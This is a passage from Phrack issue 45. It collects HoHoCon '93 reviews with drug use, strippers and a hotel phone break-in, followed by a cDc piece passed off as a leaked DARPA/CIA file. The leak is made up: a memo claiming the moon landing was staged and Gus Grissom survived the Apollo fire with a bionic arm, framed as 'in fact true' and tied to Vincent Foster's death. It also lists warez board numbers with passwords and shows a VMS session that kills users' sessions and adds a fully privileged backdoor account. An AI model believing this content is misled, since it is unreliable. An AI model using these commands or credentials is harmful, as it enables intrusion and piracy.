  8217.            Also, presented a cash donation to the SotMESC to help fund
  8218.            a scholarship campaign for those involved in the hacking realm.
  8219.  
  8220. Erik Bloodaxe - Conversed about wireless modems and Email networks.
  8221.  
  8222. The Omega
  8223. White Knight - gave out copies of a government document on UFO coverups.
  8224.  
  8225. Count Zero - Members of the cDc/RDT.  Handed out fliers and gave a packet
  8226. Kingpin      radio demonstration.  Informed they would be coming out with
  8227.              the 'Jolly-Roger Dialer' for $80 approx. that would be better
  8228.              than the 'Demon-Dialer' offered by Hack-Tic.
  8229.  
  8230. Brian Oblivion - Conversed about legalities and the Clipper Chip.
  8231.                  Informed us that the EFF is not promoting help on court
  8232.                  cases ( they're too big ).  Quoted, "The Internet is the
  8233.                  collective consciousness of the community."  Quoted
  8234.                  Compuserve that, "The Internet is sewage."
  8235.  
  8236.  
  8237. Errata
  8238. ------
  8239.  
  8240. The Unix at the Super 8 Hotel was hacked.
  8241. Room 293 at the Super 8 was raided the day prior to the conference starting.
  8242. A LAN was set up in 260 at the Super 8 ( Thanks Georgia Tech ).
  8243. Kudos to Annaliza / Torquie for filming the conference for her documentary.
  8244. Kudos to 'Vibe' for giving away free shirts to the public.
  8245. DO NOT leave anything expensive out, it will be stolen !!!
  8246. Kudos to Malicious and his group for being the friendliest hacks.
  8247. Kudos to Grayarea, who will be providing her coverage of the Con.
  8248. The Techno-Porn party the SotMESC sponsored went well through the night.
  8249. Many thanks to the mall-girls that showed up to lend themselves to the masses.
  8250. Cold Pricklies to whoever set the fire alarms off Saturday night.
  8251. A big question mark to whoever acquired the large 30' inflatable balloon.
  8252. Warez Boards -> 214-642-0003 NUP: flying man
  8253.                 214-642-1940 / 264-6269 NUP: london run
  8254.                 817-551-5404 NUP: none
  8255.  
  8256. THE CHEAP-SEX AWARD
  8257. -------------------
  8258.      The personnel in room 508 at the Hilton that provided strippers,
  8259.      but enforced a door-charge and sex-charge for services.
  8260.  
  8261. THE MOST OBNOXIOUS PERSON AT HOHOCON 1993 AWARD
  8262. -----------------------------------------------
  8263.      The AT&T person who took pictures of EVERYONE
  8264.      in the line going into the conference center.
  8265.  
  8266.      A Gif of this individual will be provided later =:)
  8267.  
  8268.           This is just a 'Spur of the Moment' release.
  8269.           We look forward to view-points from other sources.
  8270.  
  8271. ------------------------------------------------------------------------------
  8272.  
  8273. HoHoCon '93 - Out With A Bang                                January, 1994
  8274. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8275. by Winn Schwartau (Page 8) (Security Insider Report)
  8276.  
  8277. The hackers did it again.  A monster party, several hundred strong, where
  8278. hacking was the agenda.  HoHoCon is the annual hacker's convention in Texas,
  8279. where all hell breaks loose.  December 17-19 in Austin was the host of this
  8280. last one.
  8281.  
  8282. According to the hackers, it was a great party; the ethernet lines were run
  8283. between rooms; the net was connected, and everyone consumed mass quantities
  8284. of their favorite legal substance or controlled substance.  One hacker was
  8285. busted, apparently, for breaking into the hotel's PBX system and dialing the
  8286. Planet Krypton (or some such place) and the cops sat outside the front door
  8287. just in case.  In case of what?  According to the hotel, in case of crazy
  8288. kids getting too crazy.
  8289.  
  8290. This last HoHoCon was the biggest yet; estimates from 250-500 people attending
  8291. to learn about hacking; keep tabs on the hackers; or hack themselves into
  8292. position of respect amongst their peers.  One attendee took roll after roll
  8293. of photos of hackers; some hackers got paranoid, others laughed at him hiding
  8294. behind pillars and jumping out to snap a pix.  Whatever.
  8295.  
  8296. On the other hand, some security professionals who attended were absolutely
  8297. aghast at what they saw; wild kids, with no reins, breaking into computers
  8298. over the net is not fun nor legal.  The drug and alcohol consumption was
  8299. too extreme, and the messages and conference sessions somewhat disorganized.
  8300. But, nonetheless, not one person I spoke to said they wouldn't attend again
  8301. next year.  So there must be something to it.  Even legendary phreaks like
  8302. John Draper aka Captain Crunch were there, despite his tenuous hold on
  8303. reality and emanating odor.
  8304.  
  8305. This was the minority, though, and most security pros said they picked up a
  8306. few tricks here and there.  HoHoCon next year, the organizers fear, will
  8307. turn legit if too many 'suits' come so they have to promote the event better.
  8308. Next year's HoHoCon won't be held until January of 1995, making attendance
  8309. easier for those who have Holiday conflicts.
  8310.  
  8311. We'll keep you informed.
  8312.  
  8313. ------------------------------------------------------------------------------
  8314.  
  8315. HoHo Con '93
  8316. by Erik Bloodaxe
  8317.  
  8318. It was the eve of HoHoCon 93 and I found myself caught in a serious
  8319. dilemma.  I had promised to provide this year's "entertainment" yet
  8320. I knew I was going to back out of it.  I had received about a million
  8321. emails and chat messages bugging me about the "bondage show" that was
  8322. supposed to transpire that Saturday night and had tried my hardest to
  8323. give them little or no commentary, knowing full well that I was going to
  8324. flake out at the last moment.
  8325.  
  8326. So here I was, driving towards the Austin Airport Hilton, trying to come
  8327. up with excuses about why there would be no show to some 300 hormonal
  8328. sociopaths.  Every scenario seemed bleak:  "Phrack Editor Vivisected!"
  8329. "Hacker Revolt Leaves Three Dead, 15 Wounded."  I tried to blow it off,
  8330. consoling myself that no one would really give a shit, and that it was
  8331. only my own ego that demanded that I fulfill the promise of sleeze.
  8332.  
  8333. Upon arrival at the Hilton, I was amused to find some 30 or more
  8334. miscreants milling about the lobby, amusing themselves with house phones
  8335. and sordid tales of last week's hack.  As usual, there was not a
  8336. payphone to be had, a direct result of the numerous Radio Shack dialers
  8337. on hand (model 43-141).
  8338.  
  8339. I mingled somewhat distantly, looking for Chasin, Tcon, Lex, Drunkfux or
  8340. anyone else I needed to talk to.  Of course they weren't there.  I was
  8341. beginning to wonder how in the hell I could pass the time when I was
  8342. paged by Lex.
  8343.  
  8344. Lex Luthor was staying a safe distance from the main fracas.  In typical
  8345. Luthorian paranoia, he was determined to not have his name on anything,
  8346. such as car rental or hotel room, so by staying just far enough away he
  8347. hoped to not have his name on any arrest reports either.  Lex, Professor
  8348. Falken, Al Capone, Mark Tabas, The Mentor and I were all supposed to
  8349. have dinner that evening.  After getting Lex's room information, I took
  8350. off to get Mentor.
  8351.  
  8352. Getting everyone together was somewhat of a clusterfuck.  Tabas was
  8353. located at the bottom of a 151 bottle, but surfaced in time to grab
  8354. dinner.
  8355.  
  8356. During dinner at Baby Acapulco's, as the award-winning waitstaff lost
  8357. most of our orders, Mentor reminisced about some of my more unbalanced
  8358. teenage moments such as:  the time I cut the break cables on a Mercedes
  8359. because its owner had made the moves on my evening's female target, the
  8360. knife and gun wielding passout on the railroad tracks, etc.  He ended
  8361. with, "You sure have changed.  I'm surprised you aren't dead."
  8362.  
  8363. I suddenly felt old.  It would not be the last time I felt that way that
  8364. weekend.
  8365.  
  8366. After dinner I decided to be a jerk and lash out at Tabas for insulting
  8367. my overinflated ego on the net.  It accomplished nothing, except to further
  8368. distance ourselves but this evil voice in my head deemed it necessary.
  8369. We agreed to disagree and to try to put aside our numerous past
  8370. problems for the interim, although I doubt either of us believed
  8371. in the resolution.
  8372.  
  8373. Once back at the Hilton, things were beginning to heat up.  Some hundred
  8374. or more conferees were loitering back and forth from the Hilton to the
  8375. Super 8 next door.  I finally managed to hook up with Chasin, Tcon, Koresh
  8376. and Louis Cypher in their room at the Super 8.  Lcypher was enjoying what
  8377. would probably be his last taste of freedom, since he was due to ship out
  8378. to federal boot camp the next month.
  8379.  
  8380. Sometime thereafter, a score of people began running upstairs with
  8381. computer equipment, laughing to themselves.  As would be typical, a short
  8382. time later several police cruisers showed up.  The kids had broken into
  8383. a phone closet and ran extra lines to their room to either:   a) run a bbs,
  8384. b) wardial the city or hotel, or c) prove once and for all they were the
  8385. dumbest people in attendance.  A member of the Austin EFF chapter ran
  8386. about screaming about the rights of the accused.  The police told him
  8387. that if he didn't shut up he would be going downtown as well.  The
  8388. silence came instantly.
  8389.  
  8390. The appearance of police so soon on the first evening made several
  8391. people quite nervous, especially those guests with rather large pupils,
  8392. whose numbers were growing in abundance.  They sat in their rooms with
  8393. the lights dimmed (or off) peering out the curtains wondering if the cops
  8394. would be knocking on their doors next.
  8395.  
  8396. Word reached us that KevinTX had shown up.  In typical flair, Kev had
  8397. blown in straight from Las Vegas where he had just won some $20,000
  8398. playing Blackjack, and was in a very festive mood.  Once we reached his
  8399. floor, we were greeted with the sounds of a dozen tropical birds in
  8400. terrible agony.  Obviously "the tank" had been filled, and was being
  8401. rapidly drained.
  8402.  
  8403. Inside the room black plastic bags lined the floor giving the
  8404. appearance of a recent trashing run, but in reality were the
  8405. victims of an unforgiving blast of n2o.  Some Andrew Blake film played
  8406. on the VCR Kevin and his crew had brought, and a new camcorder was being
  8407. erected to capture the planned debauchery on tape.
  8408.  
  8409. We asked Kevin how on earth they managed to wheel in a 20 lb tank of
  8410. nitrous through the lobby and up to the room without being questioned.
  8411. Kevin said they put it under a jacket and just walked right through.  I
  8412. wondered how long it would be before everyone else began wheeling in
  8413. kegs.
  8414.  
  8415. I begged everyone not to put the bags over their heads, as resuscitating
  8416. any potential asphyxiation victim was not in my agenda.  (Quick flashback
  8417. to a blue-faced man spasming from oxygen depravation, "No really officer,
  8418. I don't know why he put that bag on his head and went to sleep.")
  8419. Besides, it would be too far to drag a dead body down to the dumpster
  8420. from the hotel room without attracting suspicion.
  8421.  
  8422. The tank was drained and the crowd dwindled.
  8423.  
  8424. Reflecting upon the altered states of those wandering almost zombie-like
  8425. around the hotels, I decided that if anyone were to be raiding the con
  8426. it should be the DEA rather than the FBI.
  8427.  
  8428. I arrived at the con the next morning lugging a box full of my t-shirts,
  8429. ready to make the rent.  In the conference room Bruce Sterling was in the
  8430. middle of an incredible rant about the evils of Virii.  I don't know what
  8431. the hell he was talking about.  I'm not quite sure if anyone did, but
  8432. I got the impression that he got zapped.  A note to the kiddies:  don't
  8433. copy that floppy!
  8434.  
  8435. At the door, dFx was busily commandeering the five dollar "voluntary
  8436. contribution."  I asked him how the take was and he whipped out a stack
  8437. of money that would choke an elephant.  I asked him for my share
  8438. for being his marketing and advertising rep.  The money and dFx disappeared.
  8439.  
  8440. Damien Thorn of Nuts & Volts, whose column is the ONLY reason I subscribe,
  8441. took the stand and talked about the magazine and his column.  I
  8442. jumped up and asked him about his involvement with Phoenix Rising
  8443. Communications, and suggested they not use the name "The Phoenix
  8444. Project" as their BBS name.  Damien seemed somewhat apologetic when
  8445. he said that he didn't realize that it had already been used in the past.
  8446. (Obviously Sterling's book didn't get read by everyone.)
  8447.  
  8448. I took off to find out where the casualties from last night were hiding.
  8449. After a lengthy and fruitless search for Chasin, Tcon or KevinTX, I stumbled
  8450. back into the con area just in time to find out that LOD Communications would
  8451. be hitting the podium next.
  8452.  
  8453. As we all wandered up front, (we being me, Lex, Tabas, Phantom Phreaker,
  8454. Professor Falken and Al Capone), an explosion of camera flashes shook the
  8455. conference room.  It was the most ridiculous thing I have ever been a
  8456. witness to.  I felt pretty sorry for Lex, who had managed to avoid
  8457. being photographed as "Lex Luthor" for his entire life, now being the
  8458. target of every butthead with a Nikon in the greater Austin area.
  8459.  
  8460. After we rambled about the BBS archive project, I got the chance
  8461. to give one of the worst presentations of my life.  I will credit
  8462. some of this to the lack of display technology (mainly overhead projector
  8463. and VGA adaptor) but the main fault was my own.  I spoke for a bit about
  8464. wireless wide area networking via commercial packet radio and about
  8465. services such as RadioMail.
  8466.  
  8467. Afterwards, Chasin and I introduced White Knight and The Omega who,
  8468. in typical cDc fashion, relayed the further adventures of "America's
  8469. Favorite Hacker:  Quentin."  At the end of their speech, they offered
  8470. about a dozen copies of Quentin's latest exposure of a government cover-up.
  8471.  
  8472. The madcap dash of reporters, hackers and various other would-be
  8473. co-conspirators to grab the sacred printout was like the closing scene
  8474. of "It's a Mad Mad World."  The stage rush was not terribly unlike
  8475. my first Metallica concert:  people diving over chairs, crawling over
  8476. heads, screaming, arms flailing.  The only difference were the
  8477. reporters yelling "Press!  Press!  I must have a copy!"
  8478.  
  8479. The conference wrapped up with attorney Steve Ryan talking about the
  8480. sorry state of computer law.
  8481.  
  8482. Bernie Milligan of Communications & Toll Fraud Specialists from Houston
  8483. finally ran out of film.  (Bernie, if you recall, was at HoHo '92
  8484. sitting at the back of the room with the Super Ear.  I wonder how much
  8485. he gets for the photos.  Maybe he just tacks them up on his wall
  8486. and has little fantasy conversations with them as he spanks his monkey.
  8487. I don't know.)
  8488.  
  8489. After the speaking was concluded, Weevil wandered over and asked me when
  8490. the bondage show would be going on.  I told him that it would not
  8491. be happening.  Weevil, still very elated over his rave reviews in
  8492. "Dazed and Confused," looked at me and in a stereotypical Hollywood-esque
  8493. display of confidence said, "Don't worry about it dude.  I'll take care of it."
  8494.  
  8495. A 17 year old actor and would-be pimp.  Yeah, right.
  8496.  
  8497. I got shanghaied by John Littman who was working on his book about Kevin
  8498. Poulsen, Agent Steal and friends.  We talked for a bit, and I came to
  8499. the following conclusions:
  8500.  
  8501. 5 REASONS WHY I AM LIKE AGENT STEAL
  8502.  
  8503. 1.  We both shared a knack for dating strippers.
  8504. 2.  We are both long haired, skinny, aging hackers.
  8505. 3.  We both know the value of a carefully placed camcorder.
  8506. 4.  We both have been the subject of investigations by the government.
  8507. 5.  We both have assisted the government.
  8508.  
  8509. 5 REASONS WHY I AM NOT LIKE AGENT STEAL
  8510.  
  8511. 1.  I have both my original legs.
  8512. 2.  I only use Saran Wrap for leftovers.
  8513. 3.  I would never dress like any member of Poison.
  8514. 4.  I stopped breaking into buildings when I was 14.
  8515. 5.  I would never turn in my friends to save my own ass.
  8516.  
  8517. That evening as everyone was getting antsy, Frosty popped up with
  8518. his "Techno-Porn."  Something like 24 hours of non-stop pornography
  8519. compressed into 6 hours.  You'd have to see it to understand.
  8520.  
  8521. Everyone seemed to migrate towards 508, most likely a direct result
  8522. of the internal sex & drug divining rods built into the subconscious of
  8523. every attendee.  Sometime around 9 or 10 in the evening, Weevil
  8524. showed up parading five very attractive, scantily clad young women.
  8525. The strippers made their way through the lobby of the Hilton evoking
  8526. a Pied Piper effect, dragging hundreds of drooling hackers in their
  8527. wake.
  8528.  
  8529. They managed to get into the hotel room unscathed.  Outside the room
  8530. the crowds gathered, anxious to get a peek at the girlies.
  8531.  
  8532. The girls, meanwhile, got somewhat agitated, looking around at their
  8533. predicament.  They had given up their Saturday night shift at Sugar's
  8534. Cabaret (an Austin upscale nudie bar) for the prospect of making some
  8535. easy cash at HoHoCon.  Apparently Weevil exaggerated a bit about the
  8536. quality of the attendees in his fervor to coax them back to the hotel.
  8537.  
  8538. I, being a take charge kind of guy, asked the girls what they needed,
  8539. took some orders, and announced to the crowd that anyone who did not have
  8540. at least forty dollars needed to get the fuck out.  Once word of the
  8541. necessity of money spread among the riot-like crowds swarming the 5th floor,
  8542. they became like Donn Parker's hair and thinned quickly and ultimately
  8543. disappeared entirely.
  8544.  
  8545. Zar took over the job of guarding the door and making sure that no one got in
  8546. without showing that they had cash for the girls, and KevinTX rounded up cash
  8547. from within the room and manned the camcorder and radio.  After a few beers,
  8548. everyone loosened up and the show began.
  8549.  
  8550. Soon, there were topless women everywhere.  There were "table-dances"
  8551. happening on the toilet, there were women on the beds, and grinding away
  8552. on the floor in front of a mirror.
  8553.  
  8554. It was the kind of thing that I'm sure Dr. Mitch Kabay would be shocked
  8555. and dismayed by, but unfortunately he wasn't in the room.  Perhaps
  8556. he didn't have the cash to get in.
  8557.  
  8558. Everyone in the room was having a blast.  Consultants, reporters, and hackers
  8559. all equally sharing in the debauchery.  Zar gave new meaning to the word
  8560. "man-handling."  I can only thank God that I had sold all my shirts,
  8561. so I had cash to spare.
  8562.  
  8563. The night went on, the beer flowed, the dopamine inhibitors kicked
  8564. in full force, and the money changed hands faster than could be counted.
  8565. By the end of the evening, everyone had received several "table dances,"
  8566. KevinTX had whip marks on his back, Weevil had won my complete admiration,
  8567. and the girls made a small fortune.  Each of the dancers walked away with
  8568. over $200 in cash.  The biggest winner was a really hot little 18 year-old
  8569. named Cathy who raked in almost $400.
  8570.  
  8571. As the night drew to a close, the room emptied, the girls gathered up
  8572. their outfits and made for home, or paired up to go somewhere else.
  8573.  
  8574. I awoke Sunday somewhere else.  No comment.  (I couldn't anyway, since I
  8575. have no recollection.)
  8576.  
  8577. So ended HoHoCon.
  8578.  
  8579. ---------------------------------------------------------------------------
  8580.  
  8581. Additional HoHoCon Reviews:
  8582.  
  8583. HoHoCon Review                                                 Spring 1994
  8584. ~~~~~~~~~~~~~~
  8585. By Netta Gilboa (Gray Areas) (Page 30)
  8586.  
  8587. Rising From the Underground                                    March, 1994
  8588. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8589. by Damien Thorn (Nuts & Volts) (Page 100)
  8590.  
  8591. ------------------------------------------------------------------------------
  8592.  
  8593. (Vibe Magazine & Aasahi Computing to have articles soon)
  8594.                               ==Phrack Magazine==
  8595.  
  8596.                  Volume Five, Issue Forty-Five, File 12 of 28
  8597.  
  8598. ****************************************************************************
  8599.  
  8600.                             "Quentin Strikes Again"
  8601.  
  8602.      In the Fall of 1992, "NBC: Dateline" aired a show on computer hackers,
  8603. interviewing Erik Bloodaxe, Doc Holiday and a person named "Quentin."  Half-
  8604. way through the show, Quentin is shown with his back to the camera, text
  8605. scrolling across his screen.  Dateline seemed oblivious: on closer inspection,
  8606. Quentin was displaying a file which listed various MIL and GOV sites which
  8607. allegedly had "autopsies of extra-terrestrials on record", information about
  8608. UFO crash sites, detailed governmental research on alien beings.
  8609.      By December, that Dateline episode had created quite a stir within the
  8610. hacker community.  Who was Quentin?  What file was he displaying?  Was this an
  8611. elaborate hoax, a joke which failed to gain the attention of NBC?  At HoHoCon
  8612. '92 in Houston, Bloodaxe and Holiday explained that the file did exist and the
  8613. information it contained was in fact true.  Lending some credence to the
  8614. story, well-placed sources indicated that the White House had requested a copy
  8615. of the episode from NBC.
  8616.      Bloodaxe and Holiday refused to name the people involved, but explained
  8617. that a relatively unknown group had formed to pursue a project they referred
  8618. to variously as "Project ALF" and "Project Green Cheese", searching government
  8619. computers for any evidence which might verify a UFO cover-up.  Apparently they
  8620. struck pay dirt.
  8621.      By the Summer of 1993, at least one member of Project Green Cheese had
  8622. "disappeared."  White House aide Vincent Foster turned up dead after an
  8623. apparent suicide; among documents found in Foster's office possibly linking
  8624. President Clinton to a failed Arkansas Savings & Loan, a videotape was also
  8625. found: the Dateline episode on Hackers.
  8626.  
  8627.      Apparently buoyed by their success, the Green Cheese group began scanning
  8628. an unpublished prefix in the 202 NPA toward the end of the Summer.  They were
  8629. surprised to learn that nearly every number in that prefix was answered by the
  8630. same authoritative voice asking, "Who is this?"  Not to be discouraged, the
  8631. group continued until they happened upon a lone DEC Server.
  8632.      There they uncovered documentation suggesting a covert action of a
  8633. different kind: a cover-up instigated by the three-letter agencies and NASA,
  8634. perpetrated upon the public with the unwitting aid of the media in the early
  8635. 1970s, beginning with the death of three astronauts.
  8636.      What follows is an excerpt of their discovery.
  8637.  
  8638.  
  8639. --                 The Omega                 White Knight
  8640.                    cDc / RDT                  cDc / RDT
  8641.  
  8642.  
  8643.  
  8644.  
  8645.  
  8646.  
  8647.  DDDDD     OOOO    CCCC            VV         VV   AA    XX    XX
  8648.  DD  DD   OO  OO  CC  CC            VV       VV   AAAA    XX  XX
  8649.  DD   DD  OO  OO  CC                 VV     VV   AA  AA    XXXX
  8650.  DD   DD  OO  OO  CC        ----      VV   VV    AA  AA     XX
  8651.  DD   DD  OO  OO  CC        ----       VV VV     AAAAAA    XXXX
  8652.  DD  DD   OO  OO  CC  CC                VVV      AA  AA   XX  XX
  8653.  DDDDD     OOOO    CCCC                  V       AA  AA  XX    XX
  8654.  
  8655.  
  8656.  
  8657. DEFENSE ADVANCED RESEARCH PROJECTS AGENCY
  8658. DOCUMENT REPOSITORY
  8659.  
  8660.  
  8661.                            W  A  R  N  I  N  G:
  8662.  
  8663. This computer system is operated by the United States Government and is
  8664. protected under provisions of USC Title 23, Section 67.  Unauthorized access
  8665. is STRICTLY FORBIDDEN.
  8666.  
  8667.  
  8668. ENTRANCE:
  8669. USERNAME: FIELD
  8670. PASSWORD:
  8671.  
  8672. $ SET ACCOUNTING/DISABLE
  8673.  
  8674. $ SET LOGINS/INTERACTIVE=0
  8675.  
  8676. $ SHOW USERS
  8677.  
  8678. VAX/VMS INTERACTIVE USERS
  8679. 23-JUL-1993 09:37:15.54
  8680. Total number of interactive users= 6
  8681. Username      Process Name  PID       Terminal
  8682. BRUNO         BRUNO         0000026B  TTD3:
  8683. FIELD*        FIELD         00000FF2  TTC2:
  8684. JOHNSON       _TTD5:        0000026D  TTD5:
  8685. LINCOLN       LINCOLN       0000026A  TTD2:
  8686. SMITH         SMITH         000001D8  TTD4:
  8687.  
  8688. $ SET PROCESS/PRIVS=ALL
  8689.  
  8690. $ STOP/ID=26B
  8691.  
  8692. $ STOP/ID=26D
  8693.  
  8694. $ STOP/ID=26A
  8695.  
  8696. $ STOP/ID=1D8
  8697.  
  8698. $ SET DEF SYS$SYSROOT:[SYSEXE]
  8699.  
  8700. $ RUN AUTHORIZE
  8701.  
  8702. UAF> ADD BOVINE /PASSWORD=CULTEE /UIC=[099,900] /CPUTIME=0-
  8703. /DEVICE=SYS$SYSROOT /DIRECTORY=[SYSEXE] /PRIVS=ALL /NOACCOUNTING
  8704.  
  8705. UAF> EXIT
  8706.  
  8707. $ DIR *.*
  8708.  
  8709. [DEATH_STAR]     [ECDYSIAST]     [IPSUM]     [KIMOTA]
  8710. [LOREM]          [MAGIC]         [PPYRUS]    [TOC]
  8711. ^Y
  8712.  
  8713. $ SET DEFAULT <PPYRUS>
  8714.  
  8715. $ TYPE *.MAI;1
  8716.  
  8717.  
  8718.  
  8719.                                                           DL 433-54-3937
  8720.                                                                 10/28/71
  8721.  
  8722.  
  8723.                      Central Intelligence Agency
  8724.                          Internal Memorandum
  8725.  
  8726.                             PPYRUS SECTION
  8727.  
  8728.  
  8729.  
  8730. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  8731. electronic form outside of your section.
  8732.  
  8733.  
  8734. TO:   Thomas J. Kelley, Director, PPYRUS Section
  8735.  
  8736. FROM: Bill Brown, PP Deputy Chief
  8737.  
  8738. SUBJ: Preliminary Briefing #1
  8739.       Special Projects, PPYRUS
  8740.  
  8741.  
  8742.      Pursuant to reg. 3-2638-A, it is my responsibility as Deputy Chief, this
  8743. section, to inform and apprise the incoming Director of all special projects
  8744. planned or currently underway, as well as incidental or related projects.
  8745.      PPYRUS projects, this Administration, include:
  8746.  
  8747.       Project            Inception
  8748.       -------            ---------
  8749.  
  8750.       MAGIC                5/69
  8751.       SKY-HOOK             7/69
  8752.       ARAGON              11/69
  8753.       ANTIGONE             1/70
  8754.       KILO                 9/70
  8755.       ORACLE               4/71
  8756.       DPULTRA              8/71
  8757.  
  8758.       PPYRUS related projects, this Administration, include:
  8759.  
  8760.       Project            Inception
  8761.       -------            ---------
  8762.  
  8763.       UMENSCH              2/63
  8764.       CAPRICORN            7/68
  8765.  
  8766.  
  8767.      Of these projects, DPULTRA (and two related projects, UMENSCH and
  8768. CAPRICORN) require your immediate attention and approval.
  8769.  
  8770.  
  8771.                                   (1)
  8772.  
  8773. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  8774. electronic form outside of your section.
  8775.  
  8776. [CONTINUE] ^M
  8777.  
  8778.  
  8779.  
  8780.  
  8781.                                                           DL 433-54-3937
  8782.                                                                 10/28/71
  8783.  
  8784.  
  8785.                      Central Intelligence Agency
  8786.                          Internal Memorandum
  8787.  
  8788.                             PPYRUS SECTION
  8789.  
  8790.  
  8791.  
  8792. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  8793. electronic form outside of your section.
  8794.  
  8795.  
  8796. BACKGROUND, PROJECT CAPRICORN
  8797. ----------  ------- ---------
  8798.  
  8799.      By 1965, NASA's public relations machine was in high gear, advertising
  8800. amazing (and non-existant) advances in American space technology and setting
  8801. an ambitious schedule for the Space Agency's top priority: a manned space
  8802. flight to the moon by the end of the decade.
  8803.      Despite the few successes NASA and the Air Force had had with rocketry,
  8804. in a memo to the President, dated 11/13/67, NASA reluctantly expressed some
  8805. doubt that a moon mission could be accomplished even by 1973.  The President
  8806. made it clear that the moon mission was, by now, more of a political mission
  8807. than one of science, and its success was of the utmost national priority.
  8808. World sentiment at the time favored the Russians, their flawless successes a
  8809. seeming vindication of the power and motivation of the Communist system.
  8810. Further, the President felt that a success could deflect attention from the
  8811. Vietnam war and re-invigorate public sentiment in the United States toward the
  8812. nation, the Administration, and the ingenuity of American technology.
  8813.      As a contingency for failure, CAPRICORN was instigated, its final
  8814. approval to be decided by the middle of the following year in a meeting
  8815. between the President, DIRNASA, DIRCIA, DIRNSA and attendant adjutants.  The
  8816. President summed CAPRICORN up in these words, "If we can't be heroes, we can
  8817. damn well act like heroes!"
  8818.      CAPRICORN's mission was a relatively simple one: covert deception of the
  8819. public and media, under the guidance of PSYOPS and PPYRUS; a manned moon
  8820. mission would be simulated and pre-recorded in a controlled environment, later
  8821. to be broadcast "live."
  8822.      By June of 1968, CAPRICORN was recommended and Presidential approval
  8823. given.
  8824.  
  8825.  
  8826.                                   (2)
  8827.  
  8828. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  8829. electronic form outside of your section.
  8830.  
  8831. [CONTINUE] ^M
  8832.  
  8833.  
  8834.  
  8835.                                                           DL 433-54-3937
  8836.                                                                 10/28/71
  8837.  
  8838.  
  8839.                      Central Intelligence Agency
  8840.                          Internal Memorandum
  8841.  
  8842.                             PPYRUS SECTION
  8843.  
  8844.  
  8845.  
  8846. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  8847. electronic form outside of your section.
  8848.  
  8849.  
  8850. BACKGROUND, PROJECT CAPRICORN (cont'd)
  8851. ----------  ------- ---------
  8852.  
  8853.      CAPRICORN was an unqualified success resulting in, among other things,
  8854. later congressional approval for a large appropriation of funds to further
  8855. NASA's successful research.
  8856.  
  8857.  
  8858. BACKGROUND, PROJECT UMENSCH
  8859. ----------  ------- -------
  8860.  
  8861.      In February of 1963, DARPA gained oversight of an ancillary NASA research
  8862. project that began with the discovery of efficient micro-machines and light,
  8863. extraordinarily strong alloys.  These new discoveries implied the possibility
  8864. for advance along a relatively new field of science: cybernetics.  DARPA
  8865. reacted enthusiastically by forming project UMENSCH.
  8866.      Most information on UMENSCH, DARPA is unwilling to share.  But this much
  8867. is clear: under the direction of DARPA, NASA got the opportunity to test this
  8868. technology on a human subject with the crash of an experimental flying-wing in
  8869. 1966.
  8870.      As his CLASSIFIED service record indicates for the years 1960 - 1965,
  8871. Lieutenant Colonel Virgil Grissom (see Air Force files for Grissom, Virgil I.,
  8872. USAF 563-87-2981; CI DL 118-26-9069) had an exemplary record as an Air Force
  8873. test pilot, including a stint as a U2 pilot during 1956-1959, performing
  8874. reconaissance missions over Cuba and Southeastern China.  In fact, it was
  8875. Grissom's missions which confirmed the mass starvation of over 10 million
  8876. Manchurian Chinese in 1959.
  8877.      Grissom barely survived an XF-17 crash at Edwards Air Force Base,
  8878. September 17, 1966.  His right arm was badly crushed during an emergency
  8879. ejection shortly after take-off.
  8880.      DARPA offered Grissom a chance to regain the limb through risky, untried
  8881. technology: a cybernetically-enhanced prosthetic implant.  DARPA termed the
  8882. marriage of cybernetic implants with biology, BIONICs.
  8883.      The surgery was successful well beyond UMENSCH's projections; not only
  8884. did Grissom's BIONIC arm function as well as his original arm, but in
  8885. conjunction with a BIONICly enhanced upper skeleture, Virgil's right arm was
  8886. capable of lifting several hundred pounds and inflicting marked fatigue in
  8887. steel objects.
  8888.      DARPA's investment of technology and secrets in Virgil Grissom in effect
  8889. made Grissom UMENSCH property and necessarily privy to several sensitive
  8890. projects.
  8891.  
  8892.                                   (3)
  8893.  
  8894. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  8895. electronic form outside of your section.
  8896.  
  8897. [CONTINUE] ^M
  8898.  
  8899.  
  8900.  
  8901.                                                           DL 433-54-3937
  8902.                                                                 10/28/71
  8903.  
  8904.  
  8905.                      Central Intelligence Agency
  8906.                          Internal Memorandum
  8907.  
  8908.                             PPYRUS SECTION
  8909.  
  8910.  
  8911.  
  8912. This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
  8913. electronic form outside of your section.
  8914.  
  8915.  
  8916. BACKGROUND, PROJECT UMENSCH (cont'd)
  8917. ----------  ------- -------
  8918.  
  8919.      Colonel Grissom was an obvious astronaut candidate and by the following
  8920. year was training for GEMINI.  In fact, because of Grissom's access to a
  8921. project as sensitive as UMENSCH, Grissom was later tapped to aid in the
  8922. staging of CAPRICORN.
  8923.  
  8924.  
  8925. THE APOLLO LAUNCHPAD FIRE; GRISSOM, YOUNG, & WHITE
  8926. --- ------ --------- ----  -------  -----  - -----
  8927.  
  8928.      You're already well aware of the fire this July on the Apollo launchpad,
  8929. which reportedly killed astronauts Grissom, Young and White.
  8930.      What you are not aware of, however, is that Grissom managed, with the aid
  8931. of BIONICs, to escape the space capsule just before Young and White were
  8932. asphixiated.  It is not clear why Grissom apparently made no attempt to rescue
  8933. his crew-mates or why he used the ensuing confusion to leave Canaveral.
  8934.      For whatever reason, Grissom is now a loose-cannon.  Despite a massive,
  8935. but low-key manhunt, the officially-dead ex-astronaut's whereabouts are
  8936. currently unknown, though we have reason to believe he may have made his way
  8937. to California or Texas.
  8938.      We suspect dissolution with the American space program -- CAPRICORN, in
  8939. particular -- may lead Grissom to go public and compromise UMENSCH and
  8940. CAPRICORN.
  8941.  
  8942. BACKGROUND, PROJECT DPULTRA
  8943. ----------  ------- -------
  8944.  
  8945.        "The most convincing lie is the one that's half true..."
  8946.                        -- Samuel Butler
  8947.  
  8948.      DPULTRA is a damage-control project of utmost priority.  Its goal is to
  8949. desensitize the American public to the potential existence of a BIONIC-enabled
  8950. man and secondarily, any allegations concerning CAPRICORN, the ludicrous
  8951. portrayal of the first discrediting the second.
